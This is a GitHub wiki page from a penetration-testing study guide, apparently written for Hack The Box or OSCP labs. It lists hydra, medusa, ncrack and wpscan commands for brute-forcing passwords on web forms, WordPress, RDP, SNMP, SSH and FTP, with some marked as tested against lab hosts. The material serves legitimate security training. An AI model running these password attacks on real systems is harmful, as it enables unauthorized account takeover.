Skip to content

Brute force networked services

Jump to bottom
lethanhtung01011980 edited this page Jun 16, 2020 · 16 revisions

Goals

  • To use prepared password file and brute force network services such as HTTP, SSH, FTP...
  • Directory for wordfile: /usr/share/wordlists or /usr/share/wordlists/metasploit (common-root.txt)
  • Short one: /usr/share/wordlists/fasttrack.txt
  • Long one: /usr/share/wordlists/rockyou.txt

HTTP Brute force

Attack on htaccess protected web directory

  • medusa -h victim-ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10

HTTP Password form Brute force

Need to use BurpSuite to capture post request parameters

  • BurpSuite: https://github.com/lethanhtung01011980/Notes/wiki/Webapp-proxies

  • hydra -l admin -P /usr/share/wordlists/rockyou.txt victim-ip http-post-form "/backend/backend/auth/signin:_session_key=9QGD43r7Xdek5yh20YNcBLzVcHXxfaBKPNhnygC2&_token=R9TYkP5uOHhpGkojRqsHcdl2DIHqlCaficKdAjkm&postback=1&login=^USER^&password=^PASS^:F=Forgot"

  • (Tested) admin user: hydra -l admin -P /usr/share/wordlists/rockyou.txt nineveh.htb http-post-form "/department/login.php:PHPSESSID=ephh03pnv3990cudqf5oev4g74&username=^USER^&password=^PASS^:F=Invalid"

  • PHP web: hydra 10.10.10.43 -l user -P /usr/share/SecLists/Passwords/phpbb.txt https-post-form "/db/index.php:password=^PASS^&proc_login=true:Incorrect password"

  • (Tested) https, dummy admin user hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:PHPSESSID=me12tsm6h51u63io3llqmhid16&password=^PASS^&remember=no&login=Log+In&proc_login=true:F=Incorrect"

Wordpress scan

Do 'non-intrusive' checks ...

  • wpscan -u http://victim-ip

Do wordlist password brute force on enumerated users using 50 threads ...

  • wpscan -u http://victim-ip --wordlist /usr/share/wordlists/rockyou.txt --threads 50

Do wordlist password brute force on the 'admin' username only ...

  • wpscan -u http://victim-ip --wordlist /usr/share/wordlists/rockyou.txt --username admin

RDP Brute force

Attack on Windows RDP

  • ncrack -vv --user offsec -P password-file.txt rdp://victim-ip

SNMP Brute Force

Attack on SNMP. Can be use for other protocols

  • hydra -P password-file.txt -v victim-ip snmp

SSH Brute Force

Attack on SSH

  • hydra -l root -P password-file.txt victim-ip ssh

FTP Brute Force

  • Single user and 10 threads: medusa -h 10.11.1.116 -u root -P /usr/share/wordlists/rockyou.txt -M ftp -t 10
  • Multiple users and passwords: medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp

Sidebar

HOME

0. COMMON exploits

0.1 Quick scan

0.2 Windows exploits

0.3 Linux exploits

1. Scan Info

1.1 nmnap Scan

1.1.1 nmnap scripts

1.2 Passive Gathering

1.2.1 Info harvesting

1.3 Active Gathering

1.3.1 DNS Enumeration

1.3.2 Port Scanning

1.3.3 SMB Enumeration

1.3.4 SMTP Enumeration

1.3.5 SNMP Enumeration

1.3.6 Web Enumeration

1.3.7 NFS Enumeration

1.3.8 File Enumeration

2. Pre-attack

2.1 Scan for Vuls

2.2 OpenVAS

2.2 File transfer

2.2.1 Windows victims

2.2.2 Linux victims

2.2.3 TFTP

2.2.4 FTP

2.2.5 VBScript

2.2.6 PowerShell

2.2.7 Debug.exe

2.2.8 Base64

2.2.9 nc

3. Get Reverse Shell

3.1 Create reverse shell listener

3.2 Create reverse shell payload

3.3 Upload reverse shell payload

3.4 Execute reverse shell payload

3.5 PowerShell Reverse Shell

4. Exploits

4.1 Use exploit scripts

4.2 Windows Exploits

4.2.1 ms17-010 - cve2017-0143

4.2.2 ms09-050 - cve2009-3103

4.3 Linux Exploits

4.3.1 Login via private key

4.3.2 Knockd to open SSH port

4.4 Password crack

4.4.1 Password file / hash

4.4.2 Brute force networked services

4.4.3 Password hash attack

4.4.4 Mimikart crack Win hash

4.4.5 Other password crack

4.5 Buffer Overflow

4.5.1 BO Attack Steps

4.5.2 Windows BO Example

4.5.3 Linux BO Example

4.6 Web attacks

4.6.0 Injected codes

4.6.1 Tools

4.6.2 XSS

4.6.3 LFI

4.6.4 RFI

4.6.5 MySQL Injection

4.6.6 Web application proxies

4.6.7 Automated SQL Injection Tools

4.6.8 Client-side attacks

4.6.9 PHPInfo attacks

4.6.10 WordPress attacks

6. Escalate Privilege

6.1 Escalate in Windows

6.1.1 Overview

6.1.2 EoP WinXP

6.1.3 accesschk

6.1.4 sc-Service Control

6.1.5 Add admin user

6.1.6 Migrate process

6.1.7 Runas attack

6.1.8 Change permission

6.2 Escalate in Linux

6.2.1 Overview

6.2.2 Escalate steps

6.2.3 Escape restricted shell

6.2.4 Hijack cronjobs

6.2.5 Writable passwd

7. Access and further attacks

7.1 Access servers and get proofs

7.2 Disable Firewall

7.3 Enable RDP & SSH

8. Port redirection and Tunnelling

8.1 Port Forwading & Redirection

8.2 SSH Tunneling

8.3 Proxychains

8.4 HTTP Tunneling

8.5 Traffic Encapsulation

9. Metasploit

9.1 UI+Basic commands

9.2 Aux scans

9.3 Exploit attacks

9.4 MSF payloads

9.5 DIY MSF Module

9.6 Post exploit

10. Kali

10.1 Common commands

10.2 Useful directories

10.3 Meterpreter

10.4 Nc

10.5 Ncat

10.6 Wireshark

10.7 TCPDump

10.8 John

10.9 Access DB mdbtools

10.10 Email readpst

10.11 Unzip 7z

11. Thirdparty scripts

11.1 Useful tools

11.2 nmapAutomator

11.3 Impacket MS17-010

11.4 pwntools

11.5 PowerShell

11.6 PowerSploit

11.7 HackTheBox

11.8 nishang PowerShell

11.9 Sherlock PowerShell

11.10 Watson PowerShell

11.11 Empire PowerShell

11.12 Win Exp Suggester

11.13 Linux Pri Checker

11.14 NFS Shell

12. References

14. Exam

Clone this wiki locally